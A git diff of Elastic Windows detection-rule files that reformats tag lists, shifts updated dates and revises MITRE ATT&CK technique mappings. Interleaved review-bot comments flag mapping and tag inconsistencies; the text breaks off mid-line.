"sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -66,7 +66,20 @@ references = [
 risk_score = 47
 rule_id = "ac5012b8-8da8-440b-aaaf-aedafdea2dff"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Persistence",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -84,36 +97,48 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_microsoft_defender_tampering.toml b/rules/windows/defense_evasion_microsoft_defender_tampering.toml index b79e6aecbf5..2b7315a7978 100644 --- a/rules/windows/defense_evasion_microsoft_defender_tampering.toml +++ b/rules/windows/defense_evasion_microsoft_defender_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Austin Songer"] 
@@ -140,7 +140,6 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -151,12 +150,9 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_modify_ownership_os_files.toml b/rules/windows/defense_evasion_modify_ownership_os_files.toml index 614c46dd467..21d79ba0ec9 100644 --- a/rules/windows/defense_evasion_modify_ownership_os_files.toml +++ b/rules/windows/defense_evasion_modify_ownership_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/02" [rule] 
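Review bot: The T1562.001 `Disable or Modify Tools` sub-technique is removed from defense_evasion_microsoft_defender_tampering while its parent T1562 stays, which drops the most specific mapping for a rule whose name and registry-change query context describe Defender being tampered with; the query body is outside this hunk, so confirm the removal is intended rather than collateral from the reorganisation. In the same patch defense_evasion_lsass_ppl_disabled_registry gains T1562.001, so the direction of the change is inconsistent across the two files. If the sub-technique should stay, the fix is to keep the four removed lines from `[[rule.threat.technique.subtechnique]]` through `reference = "https://attack.mitre.org/techniques/T1562/001/"` in place.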
@@ -58,7 +58,21 @@ Adversaries may modify file or directory ownership to evade access control lists risk_score = 47 rule_id = "7eb54028-ca72-4eb7-8185-b6864572347db" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -77,18 +91,21 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" - [[rule.threat.technique.subtechnique]] id = "T1222.001" name = "Windows File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + + + diff --git a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml index 4bb3d2cf781..aee207a0bb1 100644 --- a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml 
+++ b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/12" integration = ["windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -103,23 +103,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_msiexec_remote_payload.toml b/rules/windows/defense_evasion_msiexec_remote_payload.toml index b5e88f594ac..ba656ec2c14 100644 --- a/rules/windows/defense_evasion_msiexec_remote_payload.toml +++ b/rules/windows/defense_evasion_msiexec_remote_payload.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] 
@@ -62,7 +62,20 @@ MsiExec is a Windows utility for installing, maintaining, and removing software. risk_score = 73 rule_id = "c9847fe9-3bed-4e6b-b319-f9956d6dd02a" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,31 +92,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + 
diff --git a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
index e8f3559b58b..1d239873113 100644
--- a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
+++ b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/02"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/01"
 
 [transform]
 [[transform.osquery]]
@@ -166,63 +166,34 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.002" -name = "Control Panel" -reference = "https://attack.mitre.org/techniques/T1218/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.003" -name = "CMSTP" -reference = "https://attack.mitre.org/techniques/T1218/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.004" -name = "InstallUtil" -reference = "https://attack.mitre.org/techniques/T1218/004/" - [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" -[[rule.threat.technique.subtechnique]] -id = "T1218.008" -name = "Odbcconf" -reference = "https://attack.mitre.org/techniques/T1218/008/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" - -[[rule.threat.technique]] -id = "T1220" -name = "XSL Script Processing" -reference = "https://attack.mitre.org/techniques/T1220/" [rule.threat.tactic] id = "TA0005" name = "Defense 
Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml index 7a8c30ffcd2..7e8558da51c 100644 --- a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml +++ b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -66,7 +66,20 @@ references = [ risk_score = 47 rule_id = "07b1ef73-1fde-4a49-a34a-5dd40011b076" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
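Review bot: In the threat hunk that begins on the previous line (`@@ -166,63 +166,34 @@`), the `[[rule.threat.technique]]` table for T1218 "System Binary Proxy Execution" is removed but its `[[rule.threat.technique.subtechnique]]` T1218.005 "Mshta" is kept as context, so on the new side that subtechnique now hangs under the preceding technique, T1127 "Trusted Developer Utilities Proxy Execution". A subtechnique whose id prefix does not match its parent is likely to be rejected by the repository's ATT&CK validation and, at best, mislabels the rule's coverage; either remove the Mshta subtechnique along with the rest of the T1218 block or keep the T1218 parent table above it. Separately, the `updated_date` hunk for this file (and the one for tokenfilterpolicy on this line, plus most files that follow) moves the date backwards, e.g. `2026/03/23` → `2025/09/01`, which is inconsistent with content changes in the same files unless this diff is shown in reverse; confirm the direction before merging.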
@@ -96,23 +109,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.002" +name = "Pass the Hash" +reference = "https://attack.mitre.org/techniques/T1550/002/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/defense_evasion_posh_assembly_load.toml b/rules/windows/defense_evasion_posh_assembly_load.toml index 0282253c16e..b21cc5070cd 100644 --- a/rules/windows/defense_evasion_posh_assembly_load.toml +++ b/rules/windows/defense_evasion_posh_assembly_load.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -148,34 +148,49 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.001" +name = "Dynamic-link Library Injection" +reference = "https://attack.mitre.org/techniques/T1055/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1055.002" +name = "Portable Executable Injection" +reference = "https://attack.mitre.org/techniques/T1055/002/" + [[rule.threat.technique]] id = "T1620" name = "Reflective Code Loading" reference = "https://attack.mitre.org/techniques/T1620/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_compressed.toml b/rules/windows/defense_evasion_posh_compressed.toml index 065a298153f..1af9d0caffa 100644 --- a/rules/windows/defense_evasion_posh_compressed.toml +++ b/rules/windows/defense_evasion_posh_compressed.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -112,7 +112,14 @@ Setup instructions: https://ela.st/powershell-logging-setup This rule uses the following fields that require the Windows Integration v3.3.0 and up: `powershell.file.script_block_entropy_bits`. """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -142,7 +149,6 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" @@ -153,28 +159,29 @@ id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_defender_tampering.toml b/rules/windows/defense_evasion_posh_defender_tampering.toml index f0dfa740cda..c4d50b64d01 100644 --- a/rules/windows/defense_evasion_posh_defender_tampering.toml +++ b/rules/windows/defense_evasion_posh_defender_tampering.toml 
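Review bot: The tags hunk removes `"Tactic: Execution"` while the threat hunk at `@@ -153,28 +159,29 @@` leaves the `[rule.threat.tactic]` entry for TA0002 "Execution" in place, so the new side of this file maps the Execution tactic without the matching tag; a tag-to-tactic consistency check would report `Tactic: Execution` as missing. Either drop the second `[[rule.threat]]` block or keep the tag, so the two stay in step. The same mismatch appears in the posh_high_entropy, posh_obfuscation, posh_obfuscation_backtick, _backtick_var, _char_arrays, _concat_dynamic, _high_number_proportion, _iex_env_vars_reconstruction, _iex_string_reconstruction and _index_reversal hunks that follow (for the last, the threat section is outside this chunk, so that one is inferred).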
@@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -144,21 +144,39 @@ not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_encryption.toml b/rules/windows/defense_evasion_posh_encryption.toml index 6e4a932d0bc..c5e38dabe16 100644 --- a/rules/windows/defense_evasion_posh_encryption.toml +++ b/rules/windows/defense_evasion_posh_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
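Review bot: The threat hunk at `@@ -144,21 +144,39 @@` adds a second `[[rule.threat]]` block with tactic TA0002 "Execution", but no `tags` hunk for this file appears in the diff, so it is unclear whether the rule's `tags` already carries `"Tactic: Execution"`; if it does not, the rule maps a tactic without its tag. Please confirm the tag is present or add it in the same commit. The new block also omits the blank line between `[[rule.threat.technique]]` and `[[rule.threat.technique.subtechnique]]` and adds three before `[rule.threat.tactic]`, unlike the surrounding file.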
@@ -97,7 +97,14 @@ This behavior can be legitimate (protecting configuration values, packaging cont risk_score = 47 rule_id = "1d9aeb0b-9549-46f6-a32d-05e2a001b7fd" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Impact", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -133,29 +140,22 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_high_entropy.toml b/rules/windows/defense_evasion_posh_high_entropy.toml index 97903280a6b..4519eaa5024 100644 --- a/rules/windows/defense_evasion_posh_high_entropy.toml +++ b/rules/windows/defense_evasion_posh_high_entropy.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/08" [rule] author = ["Elastic"] 
@@ -115,7 +115,14 @@ Setup instructions: https://ela.st/powershell-logging-setup This rule uses the following fields that require the Windows Integration v3.3.0 and up: `powershell.file.script_block_entropy_bits`, `powershell.file.script_block_surprisal_stdev`, and `powershell.file.script_block_length`. """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "query" @@ -135,39 +142,40 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + [rule.investigation_fields] field_names = [ "@timestamp", 
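Review bot: The rewritten `tags` list in the first hunk (`@@ -115,7 +115,14 @@`) ends with `"Resources: Investigation Guide"` and no trailing comma, whereas every other multi-line `tags` list in this series ends with `"Resources: Investigation Guide",`. It parses fine as TOML, but it is the one list a formatter or the next tag addition will churn; add the trailing comma so the files stay uniform: `"Resources: Investigation Guide",`.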
diff --git a/rules/windows/defense_evasion_posh_obfuscation.toml b/rules/windows/defense_evasion_posh_obfuscation.toml index 65d2f5c7b65..3f18767f36a 100644 --- a/rules/windows/defense_evasion_posh_obfuscation.toml +++ b/rules/windows/defense_evasion_posh_obfuscation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/03" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -59,7 +59,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" 
@@ -115,36 +122,36 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml index be379bc9284..98b2aa03bc7 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -109,7 +109,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -160,39 +167,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference 